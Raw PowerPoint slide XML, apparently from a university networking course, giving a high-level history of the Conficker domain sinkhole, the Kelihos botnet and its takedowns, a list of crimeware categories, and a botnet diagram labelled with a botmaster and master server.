              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2000 domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In perpetuity (at least several years, until infections clear up)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The monetary cost of doing this is prohibitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some domains may already be registered and must be seized</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140875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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8"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9" end="9"/>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0" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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67E6-1365-4CD8-B0B9-67C6146EAD69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An Enormous Sinkhole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C628C4B-79CD-4A49-BBCE-CF68A56D472B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1821076"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ICANN waived domain registration fees for the CWG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initially, CWG registered domains days in advance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By April 2009, millions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> domains across 116 TLDs were registered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Covered all possible DGA domains through December 3, 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft and anti-virus vendors pushed cleanup tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> author(s) abandoned the botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But they were never caught </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145210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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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4376-AF82-48C4-B74A-306A820F7CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kelihos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C19DAD93-C5E1-4936-80D0-AC89669068CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resilient, P2P botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Successor to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Waledac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which was originally distributed via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Five variants, spanning 2009-2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Roughly 100K-200K infections at any given time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam, credential theft, Bitcoin mining and wallet theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taken down five times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four times: authors produced a new version, built a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>botnot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth time: author arrested</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627733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FECFD-682A-4ED4-AA4B-4BAA39D31946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crimeware Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F63E16E-C218-4B7C-87E9-BE2CEA1B7B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concealment and control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trojans, backdoors, root kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infection and propagation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Viruses and worms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealing and spying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spyware, keyloggers, screen scrapers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Profit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dialers, scareware, ransomware, ad injection and clicking, droppers, crypto currency mining, credential and account theft, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8AD32F7-50C5-4047-AD2D-03C0BD88D30F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7430184" y="1620733"/>
            <a:ext cx="3799961" cy="20149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u="sng" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A given piece of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> may exhibit multiple types of behavior!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40239951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6" name="Straight Connector 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA80BDB5-C82A-41DA-8608-E383CDD416F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4257431" y="2921015"/>
            <a:ext cx="965397" cy="1846609"/>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16" name="Straight Connector 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6B4AAF-C9C7-40CF-B513-BDA48B2027FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5258366" y="2902186"/>
            <a:ext cx="1643401" cy="1865438"/>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13" name="Straight Connector 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1B9384-206A-4FB2-A9E1-F6D361DB4914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5258366" y="4256475"/>
            <a:ext cx="2691749" cy="544435"/>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14" name="Straight Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B5A891-A7D8-494C-B312-B4C5ECBE99D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5311736" y="4848549"/>
            <a:ext cx="2082585" cy="1099007"/>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82"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484" y="4522361"/>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856CB035-4AF0-4F70-89A2-6BEC1F0C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564" y="4585223"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="135" name="Straight Connector 134">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362DB111-83E5-4AD4-913F-8474318D7FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4286196" y="2318824"/>
            <a:ext cx="4154188" cy="616648"/>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29" name="Straight Connector 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3FD83A0-050F-4E58-948E-96F2D29FC4DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4297102" y="2889343"/>
            <a:ext cx="2551154" cy="31671"/>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32" name="Straight Connector 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE6C47D-BFAC-45D7-8D0B-79CB099CED0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4297102" y="2957003"/>
            <a:ext cx="3504258" cy="1301944"/>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39" name="Straight Connector 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2DF72B-C36F-41FC-9474-FDE687AD5971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4321734" y="2935472"/>
            <a:ext cx="4787559" cy="2814982"/>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45" name="Straight Connector 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487910AD-3B1A-4925-BD32-9EA06C71B176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4273744" y="3016397"/>
            <a:ext cx="5476574" cy="632106"/>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48" name="Straight Connector 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39639310-2D87-4D93-90DE-4905C4EE9239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4286196" y="3002809"/>
            <a:ext cx="6896940" cy="1635682"/>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55" name="Straight Connector 154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C76C3E-DC48-4B34-BA70-9EB738C44A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4286196" y="3026512"/>
            <a:ext cx="3020657" cy="2804867"/>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19" name="Straight Connector 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F637DB3-271B-42C7-B413-74DA1AE8DD73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4110726" y="1437883"/>
            <a:ext cx="66826" cy="1451459"/>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76" name="Straight Connector 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E01391-D87A-4210-A270-4C9F9F4616AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6956900" y="2399897"/>
            <a:ext cx="1755211" cy="518645"/>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97" name="Straight Connector 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382D9DC5-46AD-43BD-830B-50CF89400FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638424" y="2468638"/>
            <a:ext cx="1104899" cy="109003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01" name="Straight Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0626BEF-65AD-401F-AB13-C78E1C220E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9881246" y="3708665"/>
            <a:ext cx="1301890" cy="947975"/>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03" name="Straight Connector 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557D0680-9560-49EF-BC86-EABED05472ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9302916" y="4767624"/>
            <a:ext cx="1954841" cy="1052954"/>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04" name="Straight Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F1E162-528F-48B3-B6CF-EA2C6156B9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7930462" y="4258948"/>
            <a:ext cx="1302127" cy="1443476"/>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05" name="Straight Connector 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA26BF8A-9E92-48E0-876F-523C7A8347D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7344544" y="5752927"/>
            <a:ext cx="1858575" cy="197101"/>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12" name="Straight Connector 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{845BC848-0AF2-4C6A-B853-649640DEAF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7402338" y="4301299"/>
            <a:ext cx="558854" cy="1631508"/>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15" name="Straight Connector 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4463B22-CB0C-4DC0-A700-F520C6E15B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6901767" y="2921014"/>
            <a:ext cx="1122105" cy="1294452"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534157" y="2497262"/>
            <a:ext cx="1396127" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Master Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282900" y="362910"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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1079" y="738436"/>
            <a:ext cx="979261" cy="9792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Classes\CS 4700\assets\serv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9277" y="2501468"/>
            <a:ext cx="881062" cy="8810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2482" y="2081551"/>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2353" y="5510275"/>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9852" y="441117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4622" y="2620600"/>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999" y="5624483"/>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7951" y="3304525"/>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5834" y="3992975"/>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Classes\CS 4700\assets\Email-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3701" y="1297557"/>
            <a:ext cx="613165" cy="613165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
